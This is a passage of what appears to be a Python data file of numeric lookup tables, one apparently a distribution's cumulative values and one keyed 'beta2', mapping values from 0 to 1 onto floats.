0.319: 0.2308320468303265, 0.32: 0.2321567408334091, 0.321: 0.23348407678671212, 0.322: 0.23481404159767033, 0.323: 0.23614662214778254, 0.324: 0.237481805292754, 0.325: 0.23881957786260755, 0.326: 0.24015992666183777, 0.327: 0.24150283846951434, 0.328: 0.24284830003942898, 0.329: 0.24419629810023297, 0.33: 0.245546819355548, 0.331: 0.2468998504841105, 0.332: 0.24825537813989712, 0.333: 0.24961338895226673, 0.334: 0.2509738695260785, 0.335: 0.25233680644183276, 0.336: 0.25370218625580476, 0.337: 0.25506999550016285, 0.338: 0.256440220683123, 0.339: 0.2578128482890625, 0.34: 0.2591878647786696, 0.341: 0.2605652565890646, 0.342: 0.26194501013393234, 0.343: 0.263327111803676, 0.344: 0.2647115479655286, 0.345: 0.26609830496368747, 0.346: 0.2674873691194764, 0.347: 0.2688787267314526, 0.348: 0.27027236407555005, 0.349: 0.27166826740522, 0.35: 0.27306642295155764, 0.351: 0.27446681692344055, 0.352: 0.27586943550767346, 0.353: 0.27727426486911566, 0.354: 0.2786812911508169, 0.355: 0.2800905004741664, 0.356: 0.28150187893901313, 0.357: 0.28291541262381076, 0.358: 0.2843310875857532, 0.359: 0.2857488898609069, 0.36: 0.2871688054643741, 0.361: 0.2885908203903904, 0.362: 0.2900149206125028, 0.363: 0.2914410920836759, 0.364: 0.2928693207364452, 0.365: 0.29429959248306115, 0.366: 0.29573189321561644, 0.367: 0.29716620880619204, 0.368: 0.2986025251069932, 0.369: 0.3000408279504931, 0.37: 0.301481103149569, 0.371: 0.3029233364976476, 0.372: 0.30436751376882576, 0.373: 0.3058136207180387, 0.374: 0.30726164308119197, 0.375: 0.30871156657528576, 0.376: 0.31016337689857654, 0.377: 0.31161705973070963, 0.378: 0.31307260073285487, 0.379: 0.3145299855478523, 0.38: 0.3159891998003598, 0.381: 0.3174502290969953, 0.382: 0.3189130590264567, 0.383: 0.3203776751596956, 0.384: 0.321844063050042, 0.385: 0.32331220823334217, 0.386: 0.3247820962281231, 0.387: 0.32625371253570534, 0.388: 0.3277270426403723, 0.389: 0.32920207200950036, 0.39: 0.3306787860936957, 0.391: 0.33215717032696657, 0.392: 
0.333637210126832, 0.393: 0.3351188908944808, 0.394: 0.3366021980149178, 0.395: 0.3380871168571106, 0.396: 0.3395736327741287, 0.397: 0.34106173110327953, 0.398: 0.3425513971662752, 0.399: 0.3440426162693472, 0.4: 0.3455353737034259, 0.401: 0.3470296547442512, 0.402: 0.3485254446525525, 0.403: 0.3500227286741624, 0.404: 0.35152149204017535, 0.405: 0.35302171996710374, 0.406: 0.354523397657002, 0.407: 0.3560265102976395, 0.408: 0.35753104306261807, 0.409: 0.3590369811115355, 0.41: 0.3605443095901345, 0.411: 0.36205301363042935, 0.412: 0.363563078350876, 0.413: 0.3650744888565142, 0.414: 0.36658723023910045, 0.415: 0.36810128757726324, 0.416: 0.3696166459366538, 0.417: 0.37113329037008264, 0.418: 0.3726512059176903, 0.419: 0.37417037760706584, 0.42: 0.3756907904534177, 0.421: 0.3772124294597049, 0.422: 0.3787352796167929, 0.423: 0.38025932590360995, 0.424: 0.38178455328725935, 0.425: 0.38331094672322763, 0.426: 0.38483849115546587, 0.427: 0.3863671715166128, 0.428: 0.3878969727280741, 0.429: 0.38942787970020715, 0.43: 0.3909598773324491, 0.431: 0.39249295051349326, 0.432: 0.3940270841214294, 0.433: 0.3955622630238702, 0.434: 0.3970984720781446, 0.435: 0.39863569613138533, 0.436: 0.4001739200207477, 0.437: 0.4017131285734936, 0.438: 0.4032533066071969, 0.439: 0.40479443892984845, 0.44: 0.4063365103400534, 0.441: 0.40787950562712527, 0.442: 0.40942340957127205, 0.443: 0.4109682069437599, 0.444: 0.4125138825070144, 0.445: 0.4140604210148085, 0.446: 0.41560780721240526, 0.447: 0.4171560258367122, 0.448: 0.41870506161641524, 0.449: 0.42025489927213305, 0.45: 0.4218055235166062, 0.451: 0.4233569190547962, 0.452: 0.4249090705840457, 0.453: 0.42646196279425613, 0.454: 0.42801558036802023, 0.455: 0.4295699079807639, 0.456: 0.43112493030093746, 0.457: 0.43268063199011475, 0.458: 0.4342369977031689, 0.459: 0.4357940120884325, 0.46: 0.43735165978783974, 0.461: 0.43890992543707424, 0.462: 0.44046879366572034, 0.463: 0.4420282490974222, 0.464: 0.4435882763500427, 0.465: 
0.4451488600357907, 0.466: 0.4467099847613878, 0.467: 0.44827163512821255, 0.468: 0.4498337957324814, 0.469: 0.4513964511653555, 0.47: 0.4529595860131227, 0.471: 0.45452318485734966, 0.472: 0.4560872322750172, 0.473: 0.45765171283868333, 0.474: 0.45921661111663087, 0.475: 0.4607819116730264, 0.476: 0.4623475990680795, 0.477: 0.4639136578581664, 0.478: 0.46548007259599816, 0.479: 0.4670468278307892, 0.48: 0.4686139081083855, 0.481: 0.47018129797143204, 0.482: 0.4717489819595075, 0.483: 0.47331694460931284, 0.484: 0.4748851704547982, 0.485: 0.47645364402728674, 0.486: 0.47802234985568237, 0.487: 0.4795912724665903, 0.488: 0.4811603963844984, 0.489: 0.48272970613188726, 0.49: 0.48429918622939716, 0.491: 0.48586882119599994, 0.492: 0.4874385955491512, 0.493: 0.4890084938049162, 0.494: 0.4905785004781269, 0.495: 0.49214860008258726, 0.496: 0.4937187771311442, 0.497: 0.4952890161358954, 0.498: 0.4968593016083247, 0.499: 0.4984296180594595, 0.5: 0.49999995000002634, 0.501: 0.501570281940593, 0.502: 0.503140598391728, 0.503: 0.5047108838641572, 0.504: 0.5062811228689086, 0.505: 0.5078512999174655, 0.506: 0.5094213995219258, 0.507: 0.5109914061951365, 0.508: 0.5125613044509014, 0.509: 0.5141310788040525, 0.51: 0.5157007137706554, 0.511: 0.5172701938681654, 0.512: 0.5188395036155542, 0.513: 0.5204086275334624, 0.514: 0.5219775501443703, 0.515: 0.5235462559727657, 0.516: 0.5251147295452544, 0.517: 0.5266829553907397, 0.518: 0.528250918040545, 0.519: 0.5298186020286205, 0.52: 0.5313859918916671, 0.521: 0.5329530721692634, 0.522: 0.5345198274040545, 0.523: 0.5360862421418862, 0.524: 0.537652300931973, 0.525: 0.539217988327026, 0.526: 0.5407832888834216, 0.527: 0.5423481871613691, 0.528: 0.5439126677250353, 0.529: 0.5454767151427029, 0.53: 0.5470403139869298, 0.531: 0.5486034488346969, 0.532: 0.5501661042675711, 0.533: 0.55172826487184, 0.534: 0.5532899152386647, 0.535: 0.5548510399642619, 0.536: 0.5564116236500098, 0.537: 0.5579716509026302, 0.538: 0.559531106334332, 0.539: 
0.561089974562978, 0.54: 0.5626482402122126, 0.541: 0.5642058879116199, 0.542: 0.5657629022968834, 0.543: 0.5673192680099375, 0.544: 0.5688749696991147, 0.545: 0.5704299920192883, 0.546: 0.5719843196320321, 0.547: 0.5735379372057962, 0.548: 0.5750908294160064, 0.549: 0.5766429809452559, 0.55: 0.5781943764834458, 0.551: 0.5797450007279189, 0.552: 0.5812948383836369, 0.553: 0.5828438741633399, 0.554: 0.5843920927876468, 0.555: 0.5859394789852435, 0.556: 0.5874860174930375, 0.557: 0.5890316930562921, 0.558: 0.5905764904287797, 0.559: 0.5921203943729266, 0.56: 0.5936633896599984, 0.561: 0.5952054610702033, 0.562: 0.5967465933928549, 0.563: 0.598286771426558, 0.564: 0.5998259799793038, 0.565: 0.6013642038686663, 0.566: 0.6029014279219069, 0.567: 0.6044376369761812, 0.568: 0.605972815878622, 0.569: 0.6075069494865581, 0.57: 0.6090400226676023, 0.571: 0.6105720202998441, 0.572: 0.6121029272719771, 0.573: 0.6136327284834384, 0.574: 0.6151614088445854, 0.575: 0.6166889532768235, 0.576: 0.6182153467127918, 0.577: 0.6197405740964411, 0.578: 0.621264620383258, 0.579: 0.6227874705403462, 0.58: 0.6243091095466332, 0.581: 0.6258295223929876, 0.582: 0.6273486940823675, 0.583: 0.6288666096299769, 0.584: 0.6303832540634109, 0.585: 0.6318986124227917, 0.586: 0.633412669760958, 0.587: 0.6349254111435296, 0.588: 0.6364368216491676, 0.589: 0.6379468863696165, 0.59: 0.6394555904099148, 0.591: 0.6409629188885073, 0.592: 0.6424688569374215, 0.593: 0.6439733897023986, 0.594: 0.6454765023430352, 0.595: 0.6469781800329419, 0.596: 0.6484784079598654, 0.597: 0.6499771713258791, 0.598: 0.6514744553474836, 0.599: 0.6529702452557735, 0.6: 0.6544645262966026, 0.601: 0.6559572837306726, 0.602: 0.657448502833754, 0.603: 0.6589381688967442, 0.604: 0.6604262672259017, 0.605: 0.6619127831429096, 0.606: 0.663397701985108, 0.607: 0.6648810091055518, 0.608: 0.6663626898731922, 0.609: 0.6678427296730491, 0.61: 0.6693211139063204, 0.611: 0.6707978279905191, 0.612: 0.6722728573596439, 0.613: 
0.6737461874643103, 0.614: 0.6752178037718943, 0.615: 0.6766876917666598, 0.616: 0.6781558369499654, 0.617: 0.6796222248403179, 0.618: 0.6810868409735612, 0.619: 0.6825496709030271, 0.62: 0.6840107001996586, 0.621: 0.6854699144521739, 0.622: 0.6869272992671747, 0.623: 0.6883828402693223, 0.624: 0.6898365231014565, 0.625: 0.6912883334247485, 0.626: 0.6927382569188532, 0.627: 0.6941862792820104, 0.628: 0.6956323862312337, 0.629: 0.6970765635024082, 0.63: 0.6985187968504759, 0.631: 0.6999590720495417, 0.632: 0.7013973748930374, 0.633: 0.7028336911938431, 0.634: 0.7042680067844215, 0.635: 0.7057003075169808, 0.636: 0.7071305792635945, 0.637: 0.7085588079163645, 0.638: 0.7099849793875307, 0.639: 0.7114090796096405, 0.64: 0.7128310945356621, 0.641: 0.7142510101391204, 0.642: 0.7156688124142838, 0.643: 0.717084487376214, 0.644: 0.7184980210610075, 0.645: 0.7199093995258576, 0.646: 0.7213186088492126, 0.647: 0.7227256351309164, 0.648: 0.7241304644923598, 0.649: 0.7255330830765977, 0.65: 0.7269334770484782, 0.651: 0.7283316325948096, 0.652: 0.7297275359244724, 0.653: 0.7311211732685733, 0.654: 0.7325125308805537, 0.655: 0.733901595036347, 0.656: 0.7352883520345028, 0.657: 0.7366727881963586, 0.658: 0.7380548898661029, 0.659: 0.739434643410972, 0.66: 0.7408120352213614, 0.661: 0.7421870517109705, 0.662: 0.743559679316915, 0.663: 0.7449299044998705, 0.664: 0.7462977137442283, 0.665: 0.7476630935582027, 0.666: 0.7490260304739599, 0.667: 0.7503865110477751, 0.668: 0.7517445218601482, 0.669: 0.7531000495159391, 0.67: 0.7544530806445042, 0.671: 0.7558036018998235, 0.672: 0.7571515999606306, 0.673: 0.7584970615305413, 0.674: 0.7598399733382102, 0.675: 0.761180322137431, 0.676: 0.7625180947072826, 0.677: 0.7638532778522458, 0.678: 0.7651858584023625, 0.679: 0.7665158232133165, 0.68: 0.7678431591666188, 0.681: 0.769167853169701, 0.682: 0.7704898921560582, 0.683: 0.7718092630853548, 0.684: 0.7731259529436056, 0.685: 0.7744399487432396, 0.686: 0.7757512375232757, 0.687: 
0.77705980634943, 0.688: 0.7783656423142555, 0.689: 0.7796687325372516, 0.69: 0.7809690641650093, 0.691: 0.7822666243713208, 0.692: 0.7835614003573212, 0.693: 0.7848533793516024, 0.694: 0.7861425486103601, 0.695: 0.7874288954174895, 0.696: 0.7887124070847301, 0.697: 0.7899930709517766, 0.698: 0.7912708743864384, 0.699: 0.7925458047847241, 0.7: 0.7938178495709807, 0.701: 0.7950869961980253, 0.702: 0.7963532321472501, 0.703: 0.7976165449287628, 0.704: 0.7988769220815145, 0.705: 0.8001343511734024, 0.706: 0.8013888198013999, 0.707: 0.8026403155916954, 0.708: 0.8038888261997863, 0.709: 0.8051343393106174, 0.71: 0.8063768426387102, 0.711: 0.8076163239282677, 0.712: 0.8088527709533002, 0.713: 0.8100861715177531, 0.714: 0.8113165134556105, 0.715: 0.8125437846310448, 0.716: 0.8137679729384877, 0.717: 0.8149890663028079, 0.718: 0.8162070526793901, 0.719: 0.817421920054271, 0.72: 0.8186336564442488, 0.721: 0.8198422498970002, 0.722: 0.8210476884912175, 0.723: 0.8222499603366951, 0.724: 0.8234490535744822, 0.725: 0.82464495637696, 0.726: 0.8258376569479937, 0.727: 0.8270271435230239, 0.728: 0.8282134043692099, 0.729: 0.8293964277855104, 0.73: 0.8305762021028226, 0.731: 0.8317527156841129, 0.732: 0.8329259569244847, 0.733: 0.8340959142513266, 0.734: 0.8352625761244205, 0.735: 0.8364259310360529, 0.736: 0.8375859675111375, 0.737: 0.8387426741073075, 0.738: 0.8398960394150405, 0.739: 0.8410460520577919, 0.74: 0.8421927006920776, 0.741: 0.8433359740075778, 0.742: 0.8444758607272893, 0.743: 0.8456123496075938, 0.744: 0.8467454294384124, 0.745: 0.8478750890432711, 0.746: 0.8490013172794411, 0.747: 0.8501241030380398, 0.748: 0.8512434352441408, 0.749: 0.8523593028568818, 0.75: 0.8534716948695734, 0.751: 0.8545806003098092, 0.752: 0.8556860082395743, 0.753: 0.8567879077553627, 0.754: 0.8578862879882565, 0.755: 0.8589811381040585, 0.756: 0.8600724473033952, 0.757: 0.8611602048218131, 0.758: 0.8622443999298985, 0.759: 0.8633250219333687, 0.76: 0.8644020601732016, 0.761: 
0.8654755040257103, 0.762: 0.8665453429026564, 0.763: 0.8676115662513868, 0.764: 0.8686741635548794, 0.765: 0.8697331243319023, 0.766: 0.8707884381370734, 0.767: 0.8718400945610152, 0.768: 0.8728880832303882, 0.769: 0.8739323938080559, 0.77: 0.8749730159931451, 0.771: 0.8760099395211802, 0.772: 0.8770431541641623, 0.773: 0.8780726497306806, 0.774: 0.8790984160659892, 0.775: 0.8801204430521462, 0.776: 0.8811387206080885, 0.777: 0.8821532386897348, 0.778: 0.8831639872900949, 0.779: 0.8841709564393376, 0.78: 0.8851741362049375, 0.781: 0.8861735166917408, 0.782: 0.8871690880420503, 0.783: 0.8881608404357615, 0.784: 0.8891487640904325, 0.785: 0.8901328492613948, 0.786: 0.8911130862418335, 0.787: 0.8920894653628848, 0.788: 0.8930619769937581, 0.789: 0.8940306115417905, 0.79: 0.8949953594525705, 0.791: 0.8959562112100302, 0.792: 0.8969131573365103, 0.793: 0.8978661883929069, 0.794: 0.8988152949787099, 0.795: 0.8997604677321327, 0.796: 0.9007016973301941, 0.797: 0.9016389744887798, 0.798: 0.902572289962797, 0.799: 0.9035016345462047, 0.8: 0.904426999072146, 0.801: 0.9053483744130083, 0.802: 0.9062657514805408, 0.803: 0.9071791212259233, 0.804: 0.9080884746398658, 0.805: 0.9089938027526939, 0.806: 0.9098950966344315, 0.807: 0.910792347394901, 0.808: 0.9116855461838177, 0.809: 0.9125746841908512, 0.81: 0.9134597526457117, 0.811: 0.9143407428182829, 0.812: 0.9152176460186581, 0.813: 0.9160904535972341, 0.814: 0.9169591569448252, 0.815: 0.9178237474927222, 0.816: 0.9186842167127738, 0.817: 0.9195405561174878, 0.818: 0.9203927572601225, 0.819: 0.9212408117347362, 0.82: 0.9220847111762885, 0.821: 0.9229244472607281, 0.822: 0.9237600117050847, 0.823: 0.9245913962675107, 0.824: 0.9254185927473991, 0.825: 0.9262415929854614, 0.826: 0.9270603888637834, 0.827: 0.9278749723059329, 0.828: 0.9286853352770361, 0.829: 0.9294914697838355, 0.83: 0.9302933678747891, 0.831: 0.9310910216401402, 0.832: 0.9318844232119854, 0.833: 0.9326735647643802, 0.834: 0.9334584385133998, 0.835: 
0.9342390367172065, 0.836: 0.9350153516761455, 0.837: 0.9357873757328031, 0.838: 0.9365551012720951, 0.839: 0.9373185207213172, 0.84: 0.9380776265502867, 0.841: 0.9388324112713275, 0.842: 0.9395828674393858, 0.843: 0.9403289876521342, 0.844: 0.9410707645499891, 0.845: 0.9418081908162181, 0.846: 0.9425412591769937, 0.847: 0.9432699624014971, 0.848: 0.9439942933019441, 0.849: 0.9447142447336556, 0.85: 0.9454298095952256, 0.851: 0.9461409808284335, 0.852: 0.9468477514184452, 0.853: 0.9475501143938321, 0.854: 0.9482480628266101, 0.855: 0.9489415898323792, 0.856: 0.9496306885703165, 0.857: 0.9503153522432926, 0.858: 0.9509955740979518, 0.859: 0.9516713474246952, 0.86: 0.9523426655578546, 0.861: 0.9530095218756819, 0.862: 0.9536719098004376, 0.863: 0.9543298227984653, 0.864: 0.9549832543802415, 0.865: 0.9556321981004747, 0.866: 0.9562766475580771, 0.867: 0.9569165963963785, 0.868: 0.957552038303007, 0.869: 0.9581829670101363, 0.87: 0.9588093762944023, 0.871: 0.9594312599770245, 0.872: 0.9600486119238871, 0.873: 0.9606614260455268, 0.874: 0.9612696962973124, 0.875: 0.9618734166793589, 0.876: 0.9624725812367078, 0.877: 0.9630671840593212, 0.878: 0.963657219282159, 0.879: 0.9642426810852343, 0.88: 0.9648235636936664, 0.881: 0.9653998613777618, 0.882: 0.9659715684530346, 0.883: 0.9665386792802856, 0.884: 0.9671011882656463, 0.885: 0.9676590898606391, 0.886: 0.9682123785622323, 0.887: 0.9687610489129148, 0.888: 0.9693050955007348, 0.889: 0.9698445129592854, 0.89: 0.9703792959678934, 0.891: 0.9709094392515344, 0.892: 0.9714349375810314, 0.893: 0.9719557857729668, 0.894: 0.9724719786897739, 0.895: 0.9729835112398603, 0.896: 0.9734903783775493, 0.897: 0.9739925751032259, 0.898: 0.9744900964633376, 0.899: 0.9749829375503833, 0.9: 0.9754710935031543, 0.901: 0.975954559506505, 0.902: 0.9764333307916824, 0.903: 0.9769074026361838, 0.904: 0.977376770363807, 0.905: 0.9778414293448636, 0.906: 0.9783013749960354, 0.907: 0.9787566027805276, 0.908: 0.9792071082080259, 0.909: 
0.979652886834865, 0.91: 0.9800939342639616, 0.911: 0.9805302461449361, 0.912: 0.9809618181741064, 0.913: 0.9813886460944932, 0.914: 0.9818107256959976, 0.915: 0.9822280528152776, 0.916: 0.9826406233359377, 0.917: 0.9830484331884335, 0.918: 0.9834514783502447, 0.919: 0.983849754845784, 0.92: 0.9842432587465588, 0.921: 0.9846319861711421, 0.922: 0.9850159332851474, 0.923: 0.9853950963014838, 0.924: 0.9857694714800598, 0.925: 0.9861390551281946, 0.926: 0.9865038436003799, 0.927: 0.9868638332984115, 0.928: 0.9872190206714289, 0.929: 0.9875694022159492, 0.93: 0.9879149744757998, 0.931: 0.9882557340424174, 0.932: 0.9885916775546096, 0.933: 0.9889228016987052, 0.934: 0.9892491032085032, 0.935: 0.9895705788654393, 0.936: 0.9898872254986016, 0.937: 0.9901990399846192, 0.938: 0.9905060192478585, 0.939: 0.9908081602602608, 0.94: 0.9911054600416364, 0.941: 0.9913979156594912, 0.942: 0.9916855242290242, 0.943: 0.9919682829133988, 0.944: 0.9922461889235121, 0.945: 0.9925192395181012, 0.946: 0.9927874320039602, 0.947: 0.9930507637356284, 0.948: 0.9933092321156767, 0.949: 0.9935628345946121, 0.95: 0.9938115686709654, 0.951: 0.9940554318912629, 0.952: 0.9942944218501137, 0.953: 0.9945285361901042, 0.954: 0.9947577726020647, 0.955: 0.994982128824796, 0.956: 0.9952016026454088, 0.957: 0.9954161918988457, 0.958: 0.9956258944685976, 0.959: 0.9958307082861366, 0.96: 0.9960306313311733, 0.961: 0.9962256616318514, 0.962: 0.9964157972645225, 0.963: 0.9966010363532803, 0.964: 0.9967813770714362, 0.965: 0.9969568176399499, 0.966: 0.9971273563282133, 0.967: 0.9972929914544159, 0.968: 0.9974537213842967, 0.969: 0.997609544532683, 0.97: 0.99776045936265, 0.971: 0.9979064643855302, 0.972: 0.998047558161119, 0.973: 0.9981837392977511, 0.974: 0.9983150064523987, 0.975: 0.998441358329476, 0.976: 0.9985627936837991, 0.977: 0.9986793113165953, 0.978: 0.9987909100790213, 0.979: 0.9988975888701616, 0.98: 0.9989993466374386, 0.981: 0.9990961823781122, 0.982: 0.9991880951364369, 0.983: 
0.9992750840051866, 0.984: 0.9993571481267158, 0.985: 0.9994342866927166, 0.986: 0.9995064989413405, 0.987: 0.9995737841591226, 0.988: 0.9996361416834054, 0.989: 0.999693570900148, 0.99: 0.9997460712416946, 0.991: 0.9997936421899241, 0.992: 0.9998362832780031, 0.993: 0.9998739940837995, 0.994: 0.9999067742301825, 0.995: 0.9999346234013291, 0.996: 0.9999575413149437, 0.997: 0.9999755277529793, 0.998: 0.9999885825363027, 0.999: 0.9999967055724355}, # skipcq: FLK-E231, FLK-E501 'beta2': {0.001: 0.18138618309331878, 0.002: 0.2095288006990791, 0.003: 0.22808938583740646, 0.004: 0.24231103099879125, 0.005: 0.25399266824367905, 0.006: 0.2639853316123639, 0.007: 0.27276438337239206, 0.008: 0.2806244307628958, 0.009: 0.2877616440177957, 0.01: 0.2943137216819569, 0.011: 0.3003813120390968, 0.012: 0.3060403810987299, 0.013: 0.3113497805549208, 0.014: 0.3163561002121821, 0.015: 0.3210969013101458, 0.016: 0.325602941614643, 0.017: 0.329899749275389, 0.018: 0.33400876269337276, 0.019: 0.33794817324913373, 0.02: 0.3417335597331963, 0.021: 0.3453783736859486, 0.022: 0.3488943160363729, 0.023: 0.3522916331669663, 0.024: 0.3555793523572848, 0.025: 0.3587654710031575, 0.026: 0.3618571101532857, 0.027: 0.36486064019226205, 0.028: 0.36778178455819777, 0.029: 0.37062570597348865, 0.03: 0.37339707863290983, 0.031: 0.37610014902380184, 0.032: 0.3787387874740419, 0.033: 0.3813165320847782, 0.034: 0.3838366263675599, 0.035: 0.38630205164508613, 0.036: 0.3887155550719671, 0.037: 0.3910796739716751, 0.038: 0.3933967570598198, 0.039: 0.39566898302294606, 0.04: 0.3978983768411247, 0.041: 0.400086824177587, 0.042: 0.40223608410583866, 0.043: 0.4043478004003044, 0.044: 0.4064235115828295, 0.045: 0.40846465988692804, 0.046: 0.41047259927722757, 0.047: 0.4124486026424321, 0.048: 0.41439386826257285, 0.049: 0.4163095256370182, 0.05: 0.41819664074840723, 0.051: 0.42005622082694316, 0.052: 0.4218892186715135, 0.053: 0.4236965365765072, 0.054: 0.4254790299068756, 0.055: 0.42723751035902224, 0.056: 
0.42897274894021686, 0.057: 0.4306854786954264, 0.058: 0.4323763972069631, 0.059: 0.4340461688895506, 0.06: 0.43569542710067843, 0.061: 0.4373247760837633, 0.062: 0.43893479276010283, 0.063: 0.4405260283836726, 0.064: 0.44209901007086383, 0.065: 0.443654242216893, 0.066: 0.44671336964273567, 0.067: 0.44671336964273567, 0.068: 0.4497070389866893, 0.069: 0.4497070389866893, 0.07: 0.45263858990657657, 0.071: 0.45263858990657657, 0.072: 0.4540820432314365, 0.073: 0.45551110378697934, 0.074: 0.4569261207298041, 0.075: 0.4583274301949174, 0.076: 0.45971535594807744, 0.077: 0.46109020999750316, 0.078: 0.4624522931676177, 0.079: 0.4638018956379941, 0.08: 0.46513929744980287, 0.081: 0.4664647689820931, 0.082: 0.4677785714002497, 0.083: 0.46908095707825426, 0.084: 0.47037216999690146, 0.085: 0.4716524461194248, 0.086: 0.47292201374610887, 0.087: 0.4741810938492603, 0.088: 0.47542990038988897, 0.089: 0.4766686406172559, 0.09: 0.4778975153524657, 0.091: 0.47911671925695065, 0.092: 0.48032644108707956, 0.093: 0.4815268639354624, 0.094: 0.4827181654599544, 0.095: 0.4839005181010876, 0.096: 0.48507408928867246, 0.097: 0.4862390416379627, 0.098: 0.4873955331364289, 0.099: 0.48854371732133284, 0.1: 0.4896837434487873, 0.101: 0.49081575665475574, 0.102: 0.49193989810855143, 0.103: 0.4930563051590159, 0.104: 0.49416511147415587, 0.105: 0.495266447174198, 0.106: 0.49636043895869586, 0.107: 0.49744721022798233, 0.108: 0.49852688119905497, 0.109: 0.4995995690166022, 0.11: 0.5006653878589256, 0.111: 0.5017244490394137, 0.112: 0.5027768611037023, 0.113: 0.5038227299225796, 0.114: 0.5048621587811261, 0.115: 0.5058952484639588, 0.116: 0.5069220973371278, 0.117: 0.5079428014264691, 0.118: 0.5089574544929876, 0.119: 0.5099661481050076, 0.12: 0.5109689717074745, 0.121: 0.5119660126886201, 0.122: 0.5129573564438621, 0.123: 0.5139430864373226, 0.124: 0.5149232842608563, 0.125: 0.5158980296909226, 0.126: 0.5168674007432517, 0.127: 0.5178314737253517, 0.128: 0.5187903232872535, 0.129: 
0.5197440224701283, 0.13: 0.520692642753303, 0.131: 0.5216362540994293, 0.132: 0.5225749249981224, 0.133: 0.5235087225078974, 0.134: 0.5244377122967149, 0.135: 0.52536195868101, 0.136: 0.5262815246634096, 0.137: 0.5271964719690554, 0.138: 0.5281068610807536, 0.139: 0.5290127512728111, 0.14: 0.5299142006438173, 0.141: 0.5308112661481983, 0.142: 0.5317040036268519, 0.143: 0.5325924678365663, 0.144: 0.5334767124786391, 0.145: 0.5343567902264184, 0.146: 0.5352327527520485, 0.147: 0.5361046507522651, 0.148: 0.5369725339733495, 0.149: 0.5378364512353526, 0.15: 0.5386964504554625, 0.151: 0.5395525786707096, 0.152: 0.540404882059873, 0.153: 0.5412534059647808, 0.154: 0.542098194910871, 0.155: 0.5429392926271754, 0.156: 0.5437767420656946, 0.157: 0.5446105854201171, 0.158: 0.5454408641439848, 0.159: 0.5462676189684185, 0.16: 0.5470908899191484, 0.161: 0.5479107163331672, 0.162: 0.5487271368748141, 0.163: 0.5495401895514537, 0.164: 0.5503499117285972, 0.165: 0.551156340144686, 0.166: 0.5519595109254223, 0.167: 0.5527594595976102, 0.168: 0.5535562211027355, 0.169: 0.5543498298100424, 0.17: 0.5551403195293081, 0.171: 0.5559277235232404, 0.172: 0.5567120745195285, 0.173: 0.5574934047225648, 0.174: 0.5582717458248277, 0.175: 0.559047129017996, 0.176: 0.5598195850037039, 0.177: 0.5605891440040408, 0.178: 0.5613558357717686, 0.179: 0.5621196896002469, 0.18: 0.5628807343331038, 0.181: 0.5636389983736705, 0.182: 0.5643945096941182, 0.183: 0.5651472958444157, 0.184: 0.565897383961005, 0.185: 0.5666448007752878, 0.186: 0.5673895726218545, 0.187: 0.5681317254465624, 0.188: 0.5688712848143356, 0.189: 0.5696082759168204, 0.19: 0.570342723579832, 0.191: 0.5718040861049116, 0.192: 0.5718040861049116, 0.193: 0.5732555639507467, 0.194: 0.5732555639507467, 0.195: 0.5746973432714193, 0.196: 0.5746973432714193, 0.197: 0.5761296050215254, 0.198: 0.5761296050215254, 0.199: 0.5775525251538719, 0.2: 0.5775525251538719, 0.201: 0.5789662748077831, 0.202: 0.5789662748077831, 0.203: 0.580371020488508, 
0.204: 0.580371020488508, 0.205: 0.5810700676469496, 0.206: 0.5817669242382939, 0.207: 0.5824616098472468, 0.208: 0.5831541437995564, 0.209: 0.5838445451667302, 0.21: 0.5845328327706043, 0.211: 0.5852190251878382, 0.212: 0.585903140754301, 0.213: 0.5865851975693661, 0.214: 0.5872652135000757, 0.215: 0.5879432061852801, 0.216: 0.5886191930396023, 0.217: 0.5892931912573885, 0.218: 0.5899652178165296, 0.219: 0.5906352894822113, 0.22: 0.5913034228105724, 0.221: 0.5919696341523156, 0.222: 0.5926339396561907, 0.223: 0.5932963552724543, 0.224: 0.5939568967562234, 0.225: 0.5946155796707533, 0.226: 0.5952724193906889, 0.227: 0.5959274311051924, 0.228: 0.596580629821043, 0.229: 0.5972320303656522, 0.23: 0.5978816473900281, 0.231: 0.5985294953716854, 0.232: 0.5991755886174532, 0.233: 0.5998199412662939, 0.234: 0.6004625672920095, 0.235: 0.601103480505905, 0.236: 0.6017426945594111, 0.237: 0.6023802229466413, 0.238: 0.6030160790069156, 0.239: 0.6036502759272008, 0.24: 0.6042828267445396, 0.241: 0.6049137443484032, 0.242: 0.6055430414830111, 0.243: 0.6061707307496114, 0.244: 0.6067968246086884, 0.245: 0.6074213353821661, 0.246: 0.6080442752555413, 0.247: 0.6086656562799749, 0.248: 0.6092854903743761, 0.249: 0.609903789327387, 0.25: 0.6105205647993905, 0.251: 0.6111358283244531, 0.252: 0.6117495913122184, 0.253: 0.6123618650497772, 0.254: 0.6129726607035273, 0.255: 0.6135819893209489, 0.256: 0.6141898618323709, 0.257: 0.6147962890527381, 0.258: 0.6154012816832698, 0.259: 0.6160048503131699, 0.26: 0.6166070054212498, 0.261: 0.6172077573775245, 0.262: 0.6178071164448349, 0.263: 0.6184050927803595, 0.264: 0.6190016964371575, 0.265: 0.6195969373656643, 0.266: 0.6201908254151702, 0.267: 0.6207833703352457, 0.268: 0.6213745817771764, 0.269: 0.6219644692953454, 0.27: 0.6225530423486144, 0.271: 0.6231403103016593, 0.272: 0.6237262824262815, 0.273: 0.624310967902731, 0.274: 0.624894375820968, 0.275: 0.6254765151819087, 0.276: 0.6260573948986715, 0.277: 0.6266370237977733, 0.278: 
0.627215410620342, 0.279: 0.6277925640232481, 0.28: 0.6283684925803023, 0.281: 0.628943204783341, 0.282: 0.629516709043367, 0.283: 0.6300890136916307, 0.284: 0.6306601269807006, 0.285: 0.6312300570855304, 0.286: 0.6317988121044862, 0.287: 0.6323664000603757, 0.288: 0.6329328289014384, 0.289: 0.633498106502367, 0.29: 0.6340622406652381, 0.291: 0.6346252391204967, 0.292: 0.6351871095278874, 0.293: 0.6357478594773636, 0.294: 0.6363074964900378, 0.295: 0.6368660280190218, 0.296: 0.6374234614503631, 0.297: 0.6379798041038829, 0.298: 0.6385350632340105, 0.299: 0.6390892460306717, 0.3: 0.6396423596200767, 0.301: 0.6401944110655492, 0.302: 0.6407454073683171, 0.303: 0.6412953554683015, 0.304: 0.6418442622449138, 0.305: 0.6423921345177895, 0.306: 0.6429389790475577, 0.307: 0.6434848025365723, 0.308: 0.644029611629644, 0.309: 0.6445734129147622, 0.31: 0.6451162129237973, 0.311: 0.6456580181331952, 0.312: 0.6461988349646632, 0.313: 0.6467386697858525, 0.314: 0.6472775289110052, 0.315: 0.6478154186016275, 0.316: 0.6488883144654416, 0.317: 0.6488883144654416, 0.318: 0.6499574064387202, 0.319: 0.6499574064387202, 0.32: 0.6510227427792847, 0.321: 0.6510227427792847, 0.322: 